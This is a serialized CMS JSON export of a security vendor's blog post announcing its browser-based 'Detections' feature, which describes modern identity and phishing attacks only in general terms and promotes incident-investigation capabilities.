",{"data":45031,"content":45035,"nodeType":996},{"target":45032},{"sys":45033},{"id":45034,"type":1001,"linkType":1002},"2F2p4eTMCHo3LfNQJZeGWB",[],{"data":45037,"content":45038,"nodeType":1005},{},[],{"data":45040,"content":45041,"nodeType":1009},{},[45042],{"data":45043,"marks":45044,"value":45046,"nodeType":864},{},[45045],{"type":899},"Why detection and response hasn’t kept up with threat evolution",{"data":45048,"content":45049,"nodeType":860},{},[45050],{"data":45051,"marks":45052,"value":45053,"nodeType":864},{},[],"This shift in attacker TTPs is forcing a change in how we handle detection and response. ",{"data":45055,"content":45056,"nodeType":860},{},[45057,45061,45070],{"data":45058,"marks":45059,"value":45060,"nodeType":864},{},[],"But a lot of organizations are still applying the same old playbooks to this new world where identity attacks are the ",{"data":45062,"content":45064,"nodeType":883},{"uri":45063},"https://pushsecurity.com/resources/2024-identity-attacks",[45065],{"data":45066,"marks":45067,"value":45069,"nodeType":864},{},[45068],{"type":1455},"leading cause of breaches",{"data":45071,"marks":45072,"value":45073,"nodeType":864},{},[],", with uneven outcomes. ",{"data":45075,"content":45076,"nodeType":860},{},[45077],{"data":45078,"marks":45079,"value":45080,"nodeType":864},{},[],"This isn’t because of a lack of effort or skill on the part of security teams. It’s a reflection of the tools that have been available. ",{"data":45082,"content":45083,"nodeType":860},{},[45084],{"data":45085,"marks":45086,"value":45087,"nodeType":864},{},[],"Let’s look at some of the ways detection and response hasn’t kept up with the evolution of browser-borne threats in this new landscape.",{"data":45089,"content":45090,"nodeType":1312},{},[45091],{"data":45092,"marks":45093,"value":45094,"nodeType":864},{},[],"Incomplete identity visibility ",{"data":45096,"content":45097,"nodeType":860},{},[45098],{"data":45099,"marks":45100,"value":45101,"nodeType":864},{},[],"Today’s cloud identity providers see a fraction of the overall logins your users make to online apps, compared to the comprehensive visibility of Active Directory in the old world. You don’t know where users are logging in, how they’re logging in, or whether these logins are securely using phishing-resistant methods.",{"data":45103,"content":45107,"nodeType":996},{"target":45104},{"sys":45105},{"id":45106,"type":1001,"linkType":1002},"1SUYueQct7dtWwLh3AaAtA",[],{"data":45109,"content":45110,"nodeType":860},{},[45111],{"data":45112,"marks":45113,"value":45114,"nodeType":864},{},[],"This means that identity attacks are routinely bypassing preventative, account hygiene-based controls, putting the strain on detection and response. ",{"data":45116,"content":45117,"nodeType":1312},{},[45118],{"data":45119,"marks":45120,"value":45121,"nodeType":864},{},[],"Limited detection coverage ",{"data":45123,"content":45124,"nodeType":860},{},[45125],{"data":45126,"marks":45127,"value":45128,"nodeType":864},{},[],"Email and network security tools got pretty good at intercepting old-school phishing attacks like the ones from our proverbial time capsule: static HTML pages delivered over email that could be intercepted and analyzed when entering the mailbox or being loaded by the user. ",{"data":45130,"content":45131,"nodeType":860},{},[45132,45136,45145,45149,45153],{"data":45133,"marks":45134,"value":45135,"nodeType":864},{},[],"But with modern phishing attacks dynamically obfuscating the code that loads the web page, implementing custom bot protection, and using runtime anti-analysis features, they’re ",{"data":45137,"content":45138,"nodeType":883},{"uri":7494},[45139],{"data":45140,"marks":45141,"value":45144,"nodeType":864},{},[45142,45143],{"type":1455},{"type":899},"increasingly difficult to detect",{"data":45146,"marks":45147,"value":1171,"nodeType":864},{},[45148],{"type":899},{"data":45150,"marks":45151,"value":45152,"nodeType":864},{},[],"using conventional tools",{"data":45154,"marks":45155,"value":45157,"nodeType":864},{},[45156],{"type":899},".   ",{"data":45159,"content":45160,"nodeType":860},{},[45161],{"data":45162,"marks":45163,"value":45164,"nodeType":864},{},[],"Of course, email-based detections aren’t much use if attackers are using legitimate services to camouflage their links, or bypassing email altogether by switching to alternative delivery channels like messaging apps (such as Slack and Teams), as well as public services like LinkedIn and Reddit. ",{"data":45166,"content":45167,"nodeType":860},{},[45168,45172,45179],{"data":45169,"marks":45170,"value":45171,"nodeType":864},{},[],"More recently, groups like ",{"data":45173,"content":45174,"nodeType":883},{"uri":41433},[45175],{"data":45176,"marks":45177,"value":41439,"nodeType":864},{},[45178],{"type":1455},{"data":45180,"marks":45181,"value":45182,"nodeType":864},{},[]," have even been seen using malvertising techniques, delivering phishing links masquerading as paid Google ads.",{"data":45184,"content":45185,"nodeType":1312},{},[45186],{"data":45187,"marks":45188,"value":45189,"nodeType":864},{},[],"Inadequate security logs",{"data":45191,"content":45192,"nodeType":860},{},[45193],{"data":45194,"marks":45195,"value":45196,"nodeType":864},{},[],"If you fail to spot the attack pre-account takeover, you’re reliant on being able to detect and investigate suspicious or malicious activity resulting from the compromise. ",{"data":45198,"content":45199,"nodeType":860},{},[45200,45204,45213],{"data":45201,"marks":45202,"value":45203,"nodeType":864},{},[],"This was more straightforward (if not easy) when you had the luxury of a ",{"data":45205,"content":45207,"nodeType":883},{"uri":45206},"https://pushsecurity.com/blog/shifting-detection-left-for-more-effective-itdr/",[45208],{"data":45209,"marks":45210,"value":45212,"nodeType":864},{},[45211],{"type":1455},"typical on-prem network to fall back",{"data":45214,"marks":45215,"value":45216,"nodeType":864},{},[]," on. But with cloud exploitation taking place in a matter of minutes, you don’t get much warning — and your endpoint and network-based alarms can’t help you. ",{"data":45218,"content":45219,"nodeType":860},{},[45220,45224,45233],{"data":45221,"marks":45222,"value":45223,"nodeType":864},{},[],"The situation is further complicated by the fact that you simply don’t have the logs you need because of the huge variability in how cloud and SaaS services provide logs (with many ",{"data":45225,"content":45227,"nodeType":883},{"uri":45226},"https://pushsecurity.com/blog/minimum-viable-identity-security/#id-enable-security-teams-to-detect-and-respond-to-identity-attacks",[45228],{"data":45229,"marks":45230,"value":45232,"nodeType":864},{},[45231],{"type":1455},"failing to provide security logs",{"data":45234,"marks":45235,"value":45236,"nodeType":864},{},[]," with relevant data points at all). So chances are you’re flying blind when it comes to large chunks of your business app suite. ",{"data":45238,"content":45239,"nodeType":860},{},[45240,45244,45253],{"data":45241,"marks":45242,"value":45243,"nodeType":864},{},[],"Ultimately, you’re stuck with what you can observe — typically network traffic. But ",{"data":45245,"content":45247,"nodeType":883},{"uri":45246},"https://pushsecurity.com/blog/the-web-proxy-is-dead-long-live-the-browser-extension/",[45248],{"data":45249,"marks":45250,"value":45252,"nodeType":864},{},[45251],{"type":1455},"even with a TLS-terminating proxy",{"data":45254,"marks":45255,"value":45256,"nodeType":864},{},[],", extracting fine-grained identity data points isn’t really achievable. You’re looking from the outside-in at malicious activity that’s happening in the user’s browser and trying to infer what happened.  ",{"data":45258,"content":45262,"nodeType":996},{"target":45259},{"sys":45260},{"id":45261,"type":1001,"linkType":1002},"7FMdHtbE63GMCavObETf3O",[],{"data":45264,"content":45265,"nodeType":1312},{},[45266],{"data":45267,"marks":45268,"value":45269,"nodeType":864},{},[],"Spotty control enforcement",{"data":45271,"content":45272,"nodeType":860},{},[45273,45277,45282],{"data":45274,"marks":45275,"value":45276,"nodeType":864},{},[],"And in the case that you do identify that a user clicked a malicious link and ",{"data":45278,"marks":45279,"value":45281,"nodeType":864},{},[45280],{"type":2246},"maybe ",{"data":45283,"marks":45284,"value":45285,"nodeType":864},{},[],"entered their credentials into the page — now what? ",{"data":45287,"content":45288,"nodeType":860},{},[45289],{"data":45290,"marks":45291,"value":45292,"nodeType":864},{},[],"You can reset the account in the affected app, ideally terminating active sessions — which may or may not be possible, depending on the app. This might take a while if you don’t centrally manage the app, and involve some painful emergency phone calls to employees. ",{"data":45294,"content":45295,"nodeType":860},{},[45296],{"data":45297,"marks":45298,"value":45299,"nodeType":864},{},[],"What about apps where the same password is reused? ",{"data":45301,"content":45302,"nodeType":860},{},[45303],{"data":45304,"marks":45305,"value":45306,"nodeType":864},{},[],"Or if it’s an IdP account used for SSO, what about the other apps that might be accessible now? ",{"data":45308,"content":45309,"nodeType":860},{},[45310,45314,45322],{"data":45311,"marks":45312,"value":45313,"nodeType":864},{},[],"If the attacker has created stealthy backdoors that persist through credential changes (like ",{"data":45315,"content":45316,"nodeType":883},{"uri":19131},[45317],{"data":45318,"marks":45319,"value":45321,"nodeType":864},{},[45320],{"type":1455},"creating an API key or a malicious OAuth integration",{"data":45323,"marks":45324,"value":45325,"nodeType":864},{},[],") they could still be lurking in your environment.",{"data":45327,"content":45328,"nodeType":860},{},[45329],{"data":45330,"marks":45331,"value":45333,"nodeType":864},{},[45332],{"type":899},"Suddenly, you’re not dealing with one possible control point, you’re dealing with several. ",{"data":45335,"content":45336,"nodeType":860},{},[45337],{"data":45338,"marks":45339,"value":45340,"nodeType":864},{},[],"And if you can’t trace the attack back to a source — because your email solution missed it, or it didn’t come via email, how can you triage the impact to other users? ",{"data":45342,"content":45343,"nodeType":860},{},[45344],{"data":45345,"marks":45346,"value":45347,"nodeType":864},{},[],"It’s no wonder that security teams are struggling to adapt. ",{"data":45349,"content":45350,"nodeType":1005},{},[],{"data":45352,"content":45353,"nodeType":1009},{},[45354],{"data":45355,"marks":45356,"value":45358,"nodeType":864},{},[45357],{"type":899},"How Push is solving modern identity investigations in the browser",{"data":45360,"content":45361,"nodeType":860},{},[45362],{"data":45363,"marks":45364,"value":45365,"nodeType":864},{},[],"The good news? We’ve seen this phenomenon play out before: In the early 2010s, in fact, when AV evolved into EDR. What was the big innovation then? Getting inside the data stream, in real time, and detecting and responding from a much higher-fidelity source of telemetry.",{"data":45367,"content":45368,"nodeType":860},{},[45369],{"data":45370,"marks":45371,"value":45372,"nodeType":864},{},[],"This time around, security teams need tools that take them inside the browser layer.",{"data":45374,"content":45375,"nodeType":860},{},[45376],{"data":45377,"marks":45378,"value":45379,"nodeType":864},{},[],"This approach gives you the right vantage point to defend against and investigate browser-based identity attacks, providing access to:",{"data":45381,"content":45382,"nodeType":941},{},[45383,45393,45403,45413],{"data":45384,"content":45385,"nodeType":945},{},[45386],{"data":45387,"content":45388,"nodeType":860},{},[45389],{"data":45390,"marks":45391,"value":45392,"nodeType":864},{},[],"Full decrypted HTTP traffic — not just DNS and TCP/IP metadata",{"data":45394,"content":45395,"nodeType":945},{},[45396],{"data":45397,"content":45398,"nodeType":860},{},[45399],{"data":45400,"marks":45401,"value":45402,"nodeType":864},{},[],"Full user interaction tracing — every click, keystroke, or DOM change",{"data":45404,"content":45405,"nodeType":945},{},[45406],{"data":45407,"content":45408,"nodeType":860},{},[45409],{"data":45410,"marks":45411,"value":45412,"nodeType":864},{},[],"Full inspection at every layer of execution, not just the initial HTML served",{"data":45414,"content":45415,"nodeType":945},{},[45416],{"data":45417,"content":45418,"nodeType":860},{},[45419],{"data":45420,"marks":45421,"value":45422,"nodeType":864},{},[],"Full access to browser APIs, to correlate with browser history, local storage, cookies, etc.",{"data":45424,"content":45428,"nodeType":996},{"target":45425},{"sys":45426},{"id":45427,"type":1001,"linkType":1002},"5qt0s8e1TIEUxhU1GzFO63",[],{"data":45430,"content":45431,"nodeType":860},{},[45432],{"data":45433,"marks":45434,"value":45435,"nodeType":864},{},[],"With this data, teams have the information they need to respond to and investigate browser-based attacks. But to become valuable, this data needs a translation layer that turns it from raw logs into actionable information.",{"data":45437,"content":45438,"nodeType":860},{},[45439,45443,45447],{"data":45440,"marks":45441,"value":45442,"nodeType":864},{},[],"That’s where Push’s ",{"data":45444,"marks":45445,"value":44980,"nodeType":864},{},[45446],{"type":899},{"data":45448,"marks":45449,"value":45450,"nodeType":864},{},[]," capability comes in. With it, you can:",{"data":45452,"content":45453,"nodeType":941},{},[45454,45490,45500,45510,45520,45530],{"data":45455,"content":45456,"nodeType":945},{},[45457],{"data":45458,"content":45459,"nodeType":860},{},[45460,45464,45473,45477,45486],{"data":45461,"marks":45462,"value":45463,"nodeType":864},{},[],"Get alerted in your platform of choice (via the Push admin console, ",{"data":45465,"content":45467,"nodeType":883},{"uri":45466},"https://pushsecurity.com/help/audience/administrators/docs/connect-to-siem-or-soar/send-webhook-events-to-slack/",[45468],{"data":45469,"marks":45470,"value":45472,"nodeType":864},{},[45471],{"type":1455},"Slack integration",{"data":45474,"marks":45475,"value":45476,"nodeType":864},{},[],", or your ",{"data":45478,"content":45480,"nodeType":883},{"uri":45479},"https://pushsecurity.com/help/audience/administrators/docs/connect-to-siem-or-soar/",[45481],{"data":45482,"marks":45483,"value":45485,"nodeType":864},{},[45484],{"type":1455},"SIEM/SOAR",{"data":45487,"marks":45488,"value":45489,"nodeType":864},{},[]," of choice) whenever Push detects a browser-based attack, such as AiTM phishing or a cloned login page.",{"data":45491,"content":45492,"nodeType":945},{},[45493],{"data":45494,"content":45495,"nodeType":860},{},[45496],{"data":45497,"marks":45498,"value":45499,"nodeType":864},{},[],"Review a curated timeline of the incident: Where a phishing link originated; whether a user entered their credentials on the page; what kind of phishkit was used; and whether the attack was blocked by Push.",{"data":45501,"content":45502,"nodeType":945},{},[45503],{"data":45504,"content":45505,"nodeType":860},{},[45506],{"data":45507,"marks":45508,"value":45509,"nodeType":864},{},[],"See all the other impacted accounts and apps that shared a password with the phished account so you can remediate them.",{"data":45511,"content":45512,"nodeType":945},{},[45513],{"data":45514,"content":45515,"nodeType":860},{},[45516],{"data":45517,"marks":45518,"value":45519,"nodeType":864},{},[],"See a screenshot captured by the Push browser extension of the phishing page, so you can see exactly what the user saw before the page disappears.",{"data":45521,"content":45522,"nodeType":945},{},[45523],{"data":45524,"content":45525,"nodeType":860},{},[45526],{"data":45527,"marks":45528,"value":45529,"nodeType":864},{},[],"Get additional context from urlscan.io about the domains connected to the incident, helping you understand whether a domain has been reported as malicious by other users, when it was registered, and how many times it’s been scanned.",{"data":45531,"content":45532,"nodeType":945},{},[45533],{"data":45534,"content":45535,"nodeType":860},{},[45536],{"data":45537,"marks":45538,"value":45539,"nodeType":864},{},[],"Interrogate and send this telemetry to your SIEM for you to operationalize it as part of SecOps workflows and hunt across events for similar incident characteristics.",{"data":45541,"content":45545,"nodeType":996},{"target":45542},{"sys":45543},{"id":45544,"type":1001,"linkType":1002},"5iPYWpPx4IZ2M1DykQiWsN",[],{"data":45547,"content":45548,"nodeType":1312},{},[45549],{"data":45550,"marks":45551,"value":45552,"nodeType":864},{},[],"Browser context",{"data":45554,"content":45555,"nodeType":860},{},[45556],{"data":45557,"marks":45558,"value":45559,"nodeType":864},{},[],"With Push, there’s no more: ",{"data":45561,"content":45562,"nodeType":941},{},[45563,45573,45583,45593,45603,45613],{"data":45564,"content":45565,"nodeType":945},{},[45566],{"data":45567,"content":45568,"nodeType":860},{},[45569],{"data":45570,"marks":45571,"value":45572,"nodeType":864},{},[],"Waiting (and hoping) that a browser-based attack gets recognized and reported by a user.",{"data":45574,"content":45575,"nodeType":945},{},[45576],{"data":45577,"content":45578,"nodeType":860},{},[45579],{"data":45580,"marks":45581,"value":45582,"nodeType":864},{},[],"Guesswork as to exactly what happened on the phishing page. ",{"data":45584,"content":45585,"nodeType":945},{},[45586],{"data":45587,"content":45588,"nodeType":860},{},[45589],{"data":45590,"marks":45591,"value":45592,"nodeType":864},{},[],"Struggling to get your hands on a live version of the page to see if it was actually malicious and getting thwarted because the attacker used a one-time phishing link. ",{"data":45594,"content":45595,"nodeType":945},{},[45596],{"data":45597,"content":45598,"nodeType":860},{},[45599],{"data":45600,"marks":45601,"value":45602,"nodeType":864},{},[],"Manually tracing the attack to see if it arrived by email so you can quarantine the messages. ",{"data":45604,"content":45605,"nodeType":945},{},[45606],{"data":45607,"content":45608,"nodeType":860},{},[45609],{"data":45610,"marks":45611,"value":45612,"nodeType":864},{},[],"Trawling through voluminous proxy logs for scraps of information (who else visited the link; where did it originate; etc.).",{"data":45614,"content":45615,"nodeType":945},{},[45616],{"data":45617,"content":45618,"nodeType":860},{},[45619],{"data":45620,"marks":45621,"value":45622,"nodeType":864},{},[],"Spending precious time on urlscan or VirusTotal to get basic context on a domain or IP address. ",{"data":45624,"content":45625,"nodeType":860},{},[45626],{"data":45627,"marks":45628,"value":45629,"nodeType":864},{},[],"Instead, Push gives you all the information you need in one place to investigate and respond. ",{"data":45631,"content":45632,"nodeType":860},{},[45633],{"data":45634,"marks":45635,"value":45636,"nodeType":864},{},[],"The foundation for these detections is the Push browser agent, which can be silently installed in all major browsers in your environment to begin streaming information about a user’s entire identity footprint. ",{"data":45638,"content":45639,"nodeType":860},{},[45640],{"data":45641,"marks":45642,"value":45643,"nodeType":864},{},[],"This valuable telemetry, combined with Push’s out-of-the-box controls and detections, gives you a seat on the user’s side of the equation, capturing reliable information about network requests, scripts loaded by a malicious website, and what a user clicked and navigated to: the ingredients for showing you how a browser-based attack unfolded, start to finish.",{"data":45645,"content":45649,"nodeType":996},{"target":45646},{"sys":45647},{"id":45648,"type":1001,"linkType":1002},"7ylgcaNDrxYhw7bULixM1C",[],{"data":45651,"content":45652,"nodeType":860},{},[45653],{"data":45654,"marks":45655,"value":45656,"nodeType":864},{},[],"Push raises a detection when it observes a phishing attack or when a user attempts to visit a blocked URL. You can view detections in the Push admin console, or send them to your SIEM or SOAR for correlation and analysis.",{"data":45658,"content":45659,"nodeType":1312},{},[45660],{"data":45661,"marks":45662,"value":45663,"nodeType":864},{},[],"Screenshot capture",{"data":45665,"content":45666,"nodeType":860},{},[45667],{"data":45668,"marks":45669,"value":45670,"nodeType":864},{},[],"The Push extension can also capture a screenshot at the time of a detection firing. This means security teams can see the visual characteristics of the page even if it’s since been taken down (and no more looking at bot protection screens like Cloudflare Turnstile on urlscan). ",{"data":45672,"content":45676,"nodeType":996},{"target":45673},{"sys":45674},{"id":45675,"type":1001,"linkType":1002},"58HPrc7wImm3mLxPK0yJOG",[],{"data":45678,"content":45679,"nodeType":1312},{},[45680],{"data":45681,"marks":45682,"value":45683,"nodeType":864},{},[],"Blast radius analysis for all impacted accounts & apps",{"data":45685,"content":45686,"nodeType":860},{},[45687],{"data":45688,"marks":45689,"value":45690,"nodeType":864},{},[],"With Push’s knowledge of your workforce identities — based on observing logins in the browser that use corporate credentials — the platform can also provide an analysis of the blast radius of an attack by showing you where other accounts and apps are impacted or at risk.",{"data":45692,"content":45693,"nodeType":860},{},[45694],{"data":45695,"marks":45696,"value":45697,"nodeType":864},{},[],"This information helps you understand the true impact of an incident so you can remediate all affected accounts.",{"data":45699,"content":45703,"nodeType":996},{"target":45700},{"sys":45701},{"id":45702,"type":1001,"linkType":1002},"77e8XMl2Rb0p7ZrG2wmURO",[],{"data":45705,"content":45706,"nodeType":860},{},[45707,45711,45720],{"data":45708,"marks":45709,"value":45710,"nodeType":864},{},[],"Push is able to provide this blast radius analysis by ",{"data":45712,"content":45714,"nodeType":883},{"uri":45713},"https://pushsecurity.com/help/10043/#how-push-securely-analyzes-passwords",[45715],{"data":45716,"marks":45717,"value":45719,"nodeType":864},{},[45718],{"type":1455},"securely fingerprinting users’ passwords",{"data":45721,"marks":45722,"value":45723,"nodeType":864},{},[]," when a login is observed; analyzing them for security posture issues such as missing MFA, or stolen, weak, or reused passwords; and then raising that relevant context for a given detection.",{"data":45725,"content":45726,"nodeType":1312},{},[45727],{"data":45728,"marks":45729,"value":45730,"nodeType":864},{},[],"Correlated context from urlscan.io",{"data":45732,"content":45733,"nodeType":860},{},[45734],{"data":45735,"marks":45736,"value":45737,"nodeType":864},{},[],"Finally, through an integration with urlscan.io, Push is able to provide additional context about the domains involved in a detection event, including:",{"data":45739,"content":45740,"nodeType":941},{},[45741,45751,45761,45771],{"data":45742,"content":45743,"nodeType":945},{},[45744],{"data":45745,"content":45746,"nodeType":860},{},[45747],{"data":45748,"marks":45749,"value":45750,"nodeType":864},{},[],"When they were created",{"data":45752,"content":45753,"nodeType":945},{},[45754],{"data":45755,"content":45756,"nodeType":860},{},[45757],{"data":45758,"marks":45759,"value":45760,"nodeType":864},{},[],"How many times they have previously been scanned",{"data":45762,"content":45763,"nodeType":945},{},[45764],{"data":45765,"content":45766,"nodeType":860},{},[45767],{"data":45768,"marks":45769,"value":45770,"nodeType":864},{},[],"When they were last scanned",{"data":45772,"content":45773,"nodeType":945},{},[45774],{"data":45775,"content":45776,"nodeType":860},{},[45777],{"data":45778,"marks":45779,"value":45780,"nodeType":864},{},[],"If urlscan has marked them as suspicious",{"data":45782,"content":45786,"nodeType":996},{"target":45783},{"sys":45784},{"id":45785,"type":1001,"linkType":1002},"2AKpAk65XdmaGBfe2V4qZ5",[],{"data":45788,"content":45789,"nodeType":1005},{},[],{"data":45791,"content":45792,"nodeType":1009},{},[45793],{"data":45794,"marks":45795,"value":45797,"nodeType":864},{},[45796],{"type":899},"Check out our latest webinar for practical guidance in real-world scenarios",{"data":45799,"content":45800,"nodeType":860},{},[45801,45805,45814,45817],{"data":45802,"marks":45803,"value":45804,"nodeType":864},{},[],"For practical advice and applied examples of how to use Push data in incident response — as well as some bonus examples of automated response and remediation use cases — ",{"data":45806,"content":45808,"nodeType":883},{"uri":45807},"https://pushsecurity.com/webinar/identity-detection-response",[45809],{"data":45810,"marks":45811,"value":45813,"nodeType":864},{},[45812],{"type":1455},"join us live on August 13 for our webinar",{"data":45815,"marks":45816,"value":3731,"nodeType":864},{},[],{"data":45818,"marks":45819,"value":45821,"nodeType":864},{},[45820],{"type":899},"“Identity attacks have changed — have your IR playbooks?”",{"data":45823,"content":45824,"nodeType":1005},{},[],{"data":45826,"content":45827,"nodeType":1009},{},[45828],{"data":45829,"marks":45830,"value":3578,"nodeType":864},{},[45831],{"type":899},{"data":45833,"content":45834,"nodeType":860},{},[45835],{"data":45836,"marks":45837,"value":40939,"nodeType":864},{},[],{"data":45839,"content":45840,"nodeType":860},{},[45841],{"data":45842,"marks":45843,"value":40946,"nodeType":864},{},[],{"data":45845,"content":45846,"nodeType":860},{},[45847,45850,45857],{"data":45848,"marks":45849,"value":40953,"nodeType":864},{},[],{"data":45851,"content":45852,"nodeType":883},{"uri":5642},[45853],{"data":45854,"marks":45855,"value":40961,"nodeType":864},{},[45856],{"type":1455},{"data":45858,"marks":45859,"value":21,"nodeType":864},{},[],"Introducing Push Detections: Equipping SecOps and IR teams to stop browser-based attacks","We’re launching a new Detections capability, enabling security teams to more effectively investigate and triage alerts, and build more effective workflows. ","2025-07-29T00:00:00.000Z","introducing-push-detections",{"items":45865},[45866,45868],{"sys":45867,"name":342},{"id":6596},{"sys":45869,"name":6593},{"id":6592},{"items":45871},[45872],{"fullName":849,"firstName":850,"jobTitle":851,"profilePicture":45873},{"url":853},"blog/how-push-stopped-a-high-risk-linkedin-spear-phishing-attack",{"json":45876},{"data":45877,"content":45878,"nodeType":856},{},[45879],{"data":45880,"content":45881,"nodeType":860},{},[45882],{"data":45883,"marks":45884,"value":39871,"nodeType":864},{},[],{"id":39333,"publishedAt":45886},"2026-08-12T11:53:49.235Z",{"items":45888},[45889,45891],{"sys":45890,"name":342},{"id":6596},{"sys":45892,"name":6593},{"id":6592},{"items":45894},[45895,45897,45899,45901,45903,45905,45907,45909,45911,45913,45915,45917,45919,45921],{"sys":45896,"name":279,"slug":280,"tier":31},{"id":276},{"sys":45898,"name":413,"slug":414,"tier":31},{"id":410},{"sys":45900,"name":519,"slug":520,"tier":31},{"id":516},{"sys":45902,"name":342,"slug":343,"tier":31},{"id":339},{"sys":45904,"name":261,"slug":262,"tier":45},{"id":258},{"sys":45906,"name":475,"slug":476,"tier":45},{"id":472},{"sys":45908,"name":324,"slug":325,"tier":45},{"id":321},{"sys":45910,"name":571,"slug":572,"tier":45},{"id":568},{"sys":45912,"name":466,"slug":467,"tier":45},{"id":463},{"sys":45914,"name":607,"slug":608,"tier":45},{"id":604},{"sys":45916,"name":431,"slug":432,"tier":45},{"id":428},{"sys":45918,"name":511,"slug":512,"tier":45},{"id":508},{"sys":45920,"name":351,"slug":352,"tier":45},{"id":348},{"sys":45922,"name":395,"slug":396,"tier":45},{"id":392},"RVg3tlPhCgiNrLgA2t9ScoT0T415wAVVbg_r3WaNYuc",{"id":45925,"title":40965,"authorsCollection":45926,"content":45931,"extension":228,"faqItemsCollection":46473,"faqTitle":59,"featured":6,"hashTags":59,"meta":46475,"metaTitle":46476,"ogImage":59,"postType":5740,"publishedDate":40967,"relatedBlogPostsCollection":46477,"slug":40968,"stem":47916,"subtitle":59,"summary":47917,"synopsis":40966,"sys":47928,"tagsCollection":47930,"topicsCollection":47936,"__hash__":47964},"blog/blog/phishing-with-active-directory-federation-services.json",{"items":45927},[45928],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":45929,"profilePicture":45930},[4953],{"url":4955},{"json":45932,"links":46441},{"data":45933,"content":45934,"nodeType":856},{},[45935,45941,45947,45963,45969,45985,45991,45994,46001,46007,46013,46018,46024,46064,46100,46107,46113,46129,46159,46164,46170,46175,46181,46188,46214,46219,46222,46229,46245,46261,46287,46292,46295,46302,46308,46388,46391,46398,46413,46419,46425],{"data":45936,"content":45937,"nodeType":860},{},[45938],{"data":45939,"marks":45940,"value":40384,"nodeType":864},{},[],{"data":45942,"content":45943,"nodeType":860},{},[45944],{"data":45945,"marks":45946,"value":40391,"nodeType":864},{},[],{"data":45948,"content":45949,"nodeType":860},{},[45950,45953,45960],{"data":45951,"marks":45952,"value":40398,"nodeType":864},{},[],{"data":45954,"content":45955,"nodeType":883},{"uri":40401},[45956],{"data":45957,"marks":45958,"value":40407,"nodeType":864},{},[45959],{"type":1455},{"data":45961,"marks":45962,"value":40411,"nodeType":864},{},[],{"data":45964,"content":45965,"nodeType":860},{},[45966],{"data":45967,"marks":45968,"value":40418,"nodeType":864},{},[],{"data":45970,"content":45971,"nodeType":860},{},[45972,45975,45982],{"data":45973,"marks":45974,"value":40425,"nodeType":864},{},[],{"data":45976,"content":45977,"nodeType":883},{"uri":39809},[45978],{"data":45979,"marks":45980,"value":40433,"nodeType":864},{},[45981],{"type":1455},{"data":45983,"marks":45984,"value":40437,"nodeType":864},{},[],{"data":45986,"content":45987,"nodeType":860},{},[45988],{"data":45989,"marks":45990,"value":40444,"nodeType":864},{},[],{"data":45992,"content":45993,"nodeType":1005},{},[],{"data":45995,"content":45996,"nodeType":1009},{},[45997],{"data":45998,"marks":45999,"value":40455,"nodeType":864},{},[46000],{"type":899},{"data":46002,"content":46003,"nodeType":860},{},[46004],{"data":46005,"marks":46006,"value":40462,"nodeType":864},{},[],{"data":46008,"content":46009,"nodeType":860},{},[46010],{"data":46011,"marks":46012,"value":40469,"nodeType":864},{},[],{"data":46014,"content":46017,"nodeType":996},{"target":46015},{"sys":46016},{"id":40474,"type":1001,"linkType":1002},[],{"data":46019,"content":46020,"nodeType":860},{},[46021],{"data":46022,"marks":46023,"value":40482,"nodeType":864},{},[],{"data":46025,"content":46026,"nodeType":941},{},[46027,46036,46055],{"data":46028,"content":46029,"nodeType":945},{},[46030],{"data":46031,"content":46032,"nodeType":860},{},[46033],{"data":46034,"marks":46035,"value":40495,"nodeType":864},{},[],{"data":46037,"content":46038,"nodeType":945},{},[46039],{"data":46040,"content":46041,"nodeType":860},{},[46042,46045,46052],{"data":46043,"marks":46044,"value":40505,"nodeType":864},{},[],{"data":46046,"content":46047,"nodeType":883},{"uri":40508},[46048],{"data":46049,"marks":46050,"value":441,"nodeType":864},{},[46051],{"type":1455},{"data":46053,"marks":46054,"value":40517,"nodeType":864},{},[],{"data":46056,"content":46057,"nodeType":945},{},[46058],{"data":46059,"content":46060,"nodeType":860},{},[46061],{"data":46062,"marks":46063,"value":40527,"nodeType":864},{},[],{"data":46065,"content":46066,"nodeType":860},{},[46067,46070,46077,46080,46087,46090,46097],{"data":46068,"marks":46069,"value":40534,"nodeType":864},{},[],{"data":46071,"content":46072,"nodeType":883},{"uri":40537},[46073],{"data":46074,"marks":46075,"value":40543,"nodeType":864},{},[46076],{"type":1455},{"data":46078,"marks":46079,"value":40547,"nodeType":864},{},[],{"data":46081,"content":46082,"nodeType":883},{"uri":40537},[46083],{"data":46084,"marks":46085,"value":40543,"nodeType":864},{},[46086],{"type":1455},{"data":46088,"marks":46089,"value":40558,"nodeType":864},{},[],{"data":46091,"content":46092,"nodeType":883},{"uri":40537},[46093],{"data":46094,"marks":46095,"value":40543,"nodeType":864},{},[46096],{"type":1455},{"data":46098,"marks":46099,"value":40569,"nodeType":864},{},[],{"data":46101,"content":46102,"nodeType":1312},{},[46103],{"data":46104,"marks":46105,"value":40577,"nodeType":864},{},[46106],{"type":899},{"data":46108,"content":46109,"nodeType":860},{},[46110],{"data":46111,"marks":46112,"value":40584,"nodeType":864},{},[],{"data":46114,"content":46115,"nodeType":860},{},[46116,46119,46126],{"data":46117,"marks":46118,"value":40591,"nodeType":864},{},[],{"data":46120,"content":46121,"nodeType":883},{"uri":40594},[46122],{"data":46123,"marks":46124,"value":40600,"nodeType":864},{},[46125],{"type":1455},{"data":46127,"marks":46128,"value":40604,"nodeType":864},{},[],{"data":46130,"content":46131,"nodeType":860},{},[46132,46135,46142,46145,46152,46155],{"data":46133,"marks":46134,"value":40611,"nodeType":864},{},[],{"data":46136,"content":46137,"nodeType":883},{"uri":40614},[46138],{"data":46139,"marks":46140,"value":5272,"nodeType":864},{},[46141],{"type":1455},{"data":46143,"marks":46144,"value":40623,"nodeType":864},{},[],{"data":46146,"content":46147,"nodeType":883},{"uri":5231},[46148],{"data":46149,"marks":46150,"value":40631,"nodeType":864},{},[46151],{"type":1455},{"data":46153,"marks":46154,"value":40635,"nodeType":864},{},[],{"data":46156,"marks":46157,"value":40640,"nodeType":864},{},[46158],{"type":899},{"data":46160,"content":46163,"nodeType":996},{"target":46161},{"sys":46162},{"id":40645,"type":1001,"linkType":1002},[],{"data":46165,"content":46166,"nodeType":860},{},[46167],{"data":46168,"marks":46169,"value":40653,"nodeType":864},{},[],{"data":46171,"content":46174,"nodeType":996},{"target":46172},{"sys":46173},{"id":40658,"type":1001,"linkType":1002},[],{"data":46176,"content":46177,"nodeType":860},{},[46178],{"data":46179,"marks":46180,"value":40666,"nodeType":864},{},[],{"data":46182,"content":46183,"nodeType":1312},{},[46184],{"data":46185,"marks":46186,"value":40674,"nodeType":864},{}